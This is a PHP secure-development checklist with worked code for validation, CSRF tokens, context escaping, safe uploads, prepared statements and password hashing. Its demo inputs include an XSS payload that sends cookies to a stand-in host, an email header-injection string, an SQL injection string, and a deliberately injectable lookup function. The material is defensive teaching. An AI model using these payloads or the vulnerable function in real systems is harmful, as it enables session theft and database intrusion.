Developing secure web applications with PHP

Nov 21, 2019

Deploying your PHP web application on a hardened platform is good, but it is not enough to call the application secure. It is equally or more important that the source code is developed with the same attention to security and passed through security testing. I would like to propose a checklist to work through before you go live with your site. PHP is considered one of the easiest languages for developing web applications, which is exactly why developers new to it tend to leave the common PHP security pitfalls in place.

Listed below are points that can be used as a checklist before you publish your web application.

  • Character encoding: The rule of thumb is to always produce valid output and to use UTF-8 consistently: in the HTML (meta tag and Content-Type header), the database connection and tables, JavaScript, URLs, e-mails and wherever else it is possible. A mismatch between the encoding your escaping assumes and the one the browser or database actually uses can defeat that escaping.
  • User input data validation: Validate every user input according to the purpose for which it is collected. Always validate on the server side in PHP, even if JavaScript already validates it in the browser: client-side checks are a usability feature, not a security control, because a request can be sent without the browser. Type-casting (for example to int) helps in many cases, as do the filter_var() validation filters.
  • CSRF or XSRF, Cross-Site Request Forgery: a request originating from a different site that misuses the user's authenticated state to perform unwanted operations. While a user is logged in, the session cookie is sent with every request to your site from any tab in the same browser, including requests triggered by a page the attacker controls. Write the PHP side so that GET requests are used only to read information, never for transactions, which must go through POST. Avoid $_REQUEST as much as possible and read from $_GET or $_POST as appropriate, so that a parameter meant for a POST body cannot be supplied in a link.
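As an added example (not code from the original article), here is the server-side validation of a constructed form submission, applied regardless of whatever JavaScript did in the browser. The field names and the rules for them are assumptions chosen for illustration; the same e-mail check is what keeps a CR/LF out of a mail header later on.

```php
<?php
declare(strict_types=1);

// Added example, not from the original article. Validates a constructed
// $_POST-like array on the server side; field names and rules are assumptions.

/**
 * Validate a registration form. Returns [valid, errors, cleaned values].
 */
function validateRegistration(array $input): array
{
    $errors = [];
    $clean  = [];

    // Email: filter_var rejects anything that is not a syntactically valid
    // address, which also rules out CR/LF that would inject mail headers.
    $email = filter_var($input['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['email'] = 'invalid email address';
    } else {
        $clean['email'] = $email;
    }

    // Age: must be an integer in a sensible range. FILTER_VALIDATE_INT with
    // options does the type check and the range check in one step.
    $age = filter_var($input['age'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 13, 'max_range' => 120]]);
    if ($age === false) {
        $errors['age'] = 'age must be a whole number between 13 and 120';
    } else {
        $clean['age'] = $age;           // already an int, no further cast needed
    }

    // Username: allow-list the characters instead of trying to block bad ones.
    $username = (string) ($input['username'] ?? '');
    if (preg_match('/\A[a-z0-9_]{3,20}\z/', $username) !== 1) {
        $errors['username'] = 'username must be 3-20 characters of a-z, 0-9, _';
    } else {
        $clean['username'] = $username;
    }

    // Page number from a query string: type-cast, then clamp. A cast alone
    // turns "abc" into 0 and "5; DROP" into 5, so the range still needs a check.
    $page = (int) ($input['page'] ?? 1);
    $clean['page'] = max(1, $page);

    return [count($errors) === 0, $errors, $clean];
}

// Constructed sample input standing in for $_POST: a header-injection attempt
// in the email field, a non-integer age, a valid username, a negative page.
$sample = [
    'email'    => "victim@example.com\r\nBcc: attacker@example.net",
    'age'      => '25abc',
    'username' => 'alice',
    'page'     => '-3',
];

[$ok, $errors, $clean] = validateRegistration($sample);
var_dump($ok);      // false here: email and age are rejected, username and page pass
print_r($errors);
print_r($clean);    // only the fields that passed, with proper PHP types
```

Everything that reaches the application logic comes from `$clean`, never from `$_POST` directly; a field that failed validation is simply absent.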

A further measure is to generate a random value, the CSRF token, when the user logs in. Store this token in the session, embed it in every form, and in the application logic compare the submitted token with the stored one whenever the user posts information; reject the request if they differ.
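The token scheme just described, as an added example that is not code from the original article. The form action and the session key name csrf_token are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not from the original article. Per-session CSRF token:
// generated once after login, embedded in every form, compared on every
// state-changing request. Session key and form action are assumptions.

session_start();

// At login, call session_regenerate_id(true) and unset($_SESSION['csrf_token'])
// so the new session gets a fresh token that no pre-login page has seen.

function issueCsrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes from the OS CSPRNG, hex-encoded for safe embedding.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden input to place inside every <form method="post">. */
function csrfField(): string
{
    $token = htmlspecialchars(issueCsrfToken(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

/**
 * True only when the submitted token matches the one in the session.
 * hash_equals() compares in constant time, so the comparison itself does
 * not leak how much of the token was right.
 */
function csrfTokenIsValid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? null;
    if ($expected === null || $submitted === null) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Every request that changes state must be a POST and must carry the token.
// GET is reserved for reads, so a link or <img> on another site cannot
// trigger a transaction on its own, and the token is read from $_POST only.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... perform the transaction (transfer, delete, update) ...
}

// Rendering the form: the token travels in the page, not in the cookie, so
// a forged cross-site request cannot know it.
echo '<form method="post" action="/transfer">', csrfField(),
     '<input name="amount"><button>Send</button></form>', PHP_EOL;
```

The cookie alone proves nothing, because the browser attaches it automatically; the hidden field is the part an attacking site cannot read, so a request that lacks a matching one is rejected.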

  • XSS, cross-site scripting: always treat HTML in user-submitted data as hostile, for example when accepting comments on posts or collecting reviews and displaying them on the site. An injected script runs in other visitors' browsers and can steal session cookies or act on their behalf. Use htmlspecialchars() (with ENT_QUOTES and the UTF-8 charset) whenever you echo user data so that it cannot form HTML tags or attributes, and strip_tags() where markup should not appear at all; note that strip_tags() removes tags but does not escape the remaining characters, so the output still needs htmlspecialchars().
  • Non-disclosure of the file system: if your website lets users download files, resolve the file path internally from an identifier, check that it stays inside the intended directory, and send the file with the appropriate header() calls (Content-Type and Content-Disposition). Do not build download links that carry the file's path, since such a link discloses your folder structure and invites path-traversal attempts.
  • Restrict file uploads: a user could upload a file with a .php extension, or any other executable file, through the upload feature on your site. Check the MIME type of the uploaded file's contents with finfo_file() or a similar function rather than trusting the browser-supplied type. Keep an array of allowed file extensions and check that the uploaded file's extension is in it, rename the file on the server, and store uploads outside the web root so that nothing uploaded can be executed by the web server.
  • SQL injection: any user input that is concatenated into a string and executed as an SQL query is a vector for SQL injection. Characters such as semicolons, single quotes, double quotes and hyphens (the comment marker) have meaning in SQL and let the input alter the statement, compromising the database and exposing it to unauthorized access. Rather than escaping these characters by hand, use prepare() and execute(): the query text is fixed and the values are bound as parameters, so they can never change the statement's structure. Most modern PHP frameworks and their database layers do this for you.
  • Other security measures include:
    • Use proper error handling: log errors, and never display PHP errors or stack traces to users in production.
    • Always give included files a .php extension so that, if one is ever requested directly, the server executes it instead of serving its source; better still, keep them outside the web root.
    • Filter the value of the "From" header before passing it to the mail function: a value containing CR/LF can inject additional headers such as Bcc.
    • Use a strong password hashing algorithm when storing passwords (password_hash() with PASSWORD_DEFAULT); never store them in plaintext or as unsalted MD5/SHA hashes.
    • Encrypt session data before you store it, or at least keep the session store out of reach of other users on the host.
    • A strong, modern cipher (AES through OpenSSL or libsodium) for data you must encrypt at rest is also a good measure.
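The XSS and character-encoding points above, as an added example that is not part of the original article: one comment string is escaped differently for each output context it lands in. The helper names e(), js() and urlParam() and the sample comment are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not from the original article. Escaping user-supplied text
// for each output context, the job strip_tags() alone does not do. Helper
// names and the sample strings are assumptions.

header('Content-Type: text/html; charset=UTF-8'); // state the encoding explicitly

/** HTML body and attribute context. ENT_QUOTES also escapes ' so a value in a
 *  single-quoted attribute cannot break out; ENT_SUBSTITUTE replaces invalid
 *  UTF-8 instead of returning an empty string. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Value placed inside a <script> block: json_encode with the HEX flags turns
 *  <, >, &, ' and " into \uXXXX escapes, so "</script>" cannot end the block. */
function js(string $s): string
{
    $out = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $out === false ? '""' : $out;
}

/** Value placed inside a query string component. */
function urlParam(string $s): string
{
    return rawurlencode($s);
}

// Constructed comment and author name, the kind a review form might receive.
$comment = "<script>document.location='https://evil.example/?c='+document.cookie</script>";
$author  = "Bob\" onmouseover=\"alert(1)";

// Vulnerable: the raw comment would be echoed and the script would execute.
// Built here for contrast only; it is deliberately never echoed.
$vulnerable = '<p>' . $comment . '</p>';

// Hardened: each context gets its own escaping function.
$safe = '<p class="comment" data-author="' . e($author) . '">' . e($comment) . '</p>'
      . '<script>var author = ' . js($author) . ';</script>'
      . '<a href="/profile?u=' . urlParam($author) . '">profile</a>';

// strip_tags() removes markup but leaves quotes and angle-bracket remnants
// alone, so it is a content-policy tool, not an escaping tool: escape after it.
$plain = e(strip_tags($comment));

echo $safe, PHP_EOL, $plain, PHP_EOL;
```

The rule is one escaping function per context, applied at output time, not at storage time: stored data stays as the user typed it, and each page decides how to encode it for the place it is used.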
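The upload and download points above together, as an added example that is not part of the original article: uploads are checked by content MIME type and extension, renamed and stored outside the web root, and downloads are served by the stored name through readfile() so no file system path ever appears in a URL. The storage directory, the allowed-type table and the record fields in the usage comment are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not from the original article. Upload validation with
// finfo_file() plus an extension allow-list, and a download handler that
// never exposes a path. UPLOAD_DIR and ALLOWED_TYPES are assumptions.

const UPLOAD_DIR = '/var/app/uploads';   // deliberately not under the document root

// Allow-list: extension => the MIME type that finfo must report for it.
const ALLOWED_TYPES = [
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
];

/**
 * Validate one entry of $_FILES and move it into UPLOAD_DIR under a random
 * name. Returns the stored file name on success, null on rejection.
 */
function storeUpload(array $file): ?string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        return null;
    }

    // Extension taken from the client-supplied name, lower-cased, checked first.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // MIME type sniffed from the file contents, not from $file['type'],
    // which the browser chose and the attacker controls.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $tmp);
    finfo_close($finfo);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;                       // e.g. shell.php renamed to shell.png
    }

    // Random server-side name: the original name never touches the disk.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, UPLOAD_DIR . '/' . $stored)) {
        return null;
    }
    return $stored;
}

/**
 * Serve a file previously stored by storeUpload(). The stored name is checked
 * against the pattern it was generated with, and the resolved path must lie
 * inside UPLOAD_DIR, so "../" or a symlink cannot reach anything else.
 */
function sendDownload(string $stored, string $downloadName): void
{
    if (preg_match('/\A[0-9a-f]{32}\.[a-z0-9]+\z/', $stored) !== 1) {
        http_response_code(404);
        return;
    }
    $path = realpath(UPLOAD_DIR . '/' . $stored);
    if ($path === false || strpos($path, realpath(UPLOAD_DIR) . '/') !== 0) {
        http_response_code(404);
        return;
    }
    $ext = pathinfo($path, PATHINFO_EXTENSION);
    header('Content-Type: ' . (ALLOWED_TYPES[$ext] ?? 'application/octet-stream'));
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');   // browser must not sniff a different type
    // Serve as an attachment; basename() and the character filter keep the
    // user-visible name from breaking out of the header value.
    $name = preg_replace('/[^\x20-\x7E]|"/', '_', basename($downloadName));
    header('Content-Disposition: attachment; filename="' . $name . '"');
    readfile($path);
}

// Usage from a request handler (field and record names are assumptions):
//   $stored = storeUpload($_FILES['document']);    // persist $stored with the record
//   sendDownload($row['stored_name'], $row['original_name']);
```

Because UPLOAD_DIR is outside the document root, even a file that fools both checks (a valid PNG with PHP appended, say) is never reachable as a URL and is only ever read back by readfile(), which treats it as bytes, not as code.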
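The SQL injection and password hashing points above together, as an added example that is not part of the original article: a user lookup written the injectable way beside its prepared-statement form, and password_hash()/password_verify() for the stored credential. It uses an in-memory SQLite database through PDO so it runs stand-alone; the users table and the sample account are constructed.

```php
<?php
declare(strict_types=1);

// Added example, not from the original article. Vulnerable vs. prepared
// lookup, plus bcrypt password storage. Table layout and data are constructed.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// On MySQL also set PDO::ATTR_EMULATE_PREPARES to false so the server, not the
// client library, separates the query text from the bound values.

$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');

/** Store a new user: never the plaintext, only the salted bcrypt hash. */
function createUser(PDO $pdo, string $username, string $password): void
{
    $stmt = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)');
    $stmt->execute([
        ':u' => $username,
        ':h' => password_hash($password, PASSWORD_DEFAULT),
    ]);
}

/** VULNERABLE: user input concatenated into the SQL string. */
function findUserVulnerable(PDO $pdo, string $username): ?array
{
    $sql = "SELECT id, username, password_hash FROM users WHERE username = '" . $username . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** HARDENED: the query text is fixed; the value travels as a bound parameter
 *  and can never change the statement's structure. */
function findUser(PDO $pdo, string $username): ?array
{
    $stmt = $pdo->prepare('SELECT id, username, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Verify a submitted password against the stored hash and re-hash it if the
 *  default algorithm or cost has moved on since the hash was created. */
function login(PDO $pdo, string $username, string $password): bool
{
    $user = findUser($pdo, $username);
    if ($user === null || !password_verify($password, $user['password_hash'])) {
        return false;
    }
    if (password_needs_rehash($user['password_hash'], PASSWORD_DEFAULT)) {
        $stmt = $pdo->prepare('UPDATE users SET password_hash = :h WHERE id = :id');
        $stmt->execute([':h' => password_hash($password, PASSWORD_DEFAULT), ':id' => $user['id']]);
    }
    return true;
}

createUser($pdo, 'alice', 'correct horse battery staple');

// The classic payload closes the quote and makes the WHERE clause always true,
// so the vulnerable lookup hands back a row without knowing any username,
// while the prepared version looks for a user literally named "' OR '1'='1".
$payload = "' OR '1'='1";
var_dump(findUserVulnerable($pdo, $payload) !== null);
var_dump(findUser($pdo, $payload));

var_dump(login($pdo, 'alice', 'correct horse battery staple'));
var_dump(login($pdo, 'alice', 'wrong password'));
```

Note that the password is compared only through password_verify(): the hash is never part of the query's WHERE clause, so a timing difference or an injected OR cannot substitute for knowing it.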

Web application security measures are taken when the architecture is designed, not bolted on afterwards. Nor should steps taken for security reduce usability: security must be implemented with your website's users in mind and must be included in the development budget.

This is a short tutorial for PHP developers and only scratches the surface of secure development techniques. It is up to the developer to understand the depth of the vulnerabilities and possible attacks on applications over the web; developers should dig deeper into each of the points listed here and into those left out of this discussion.
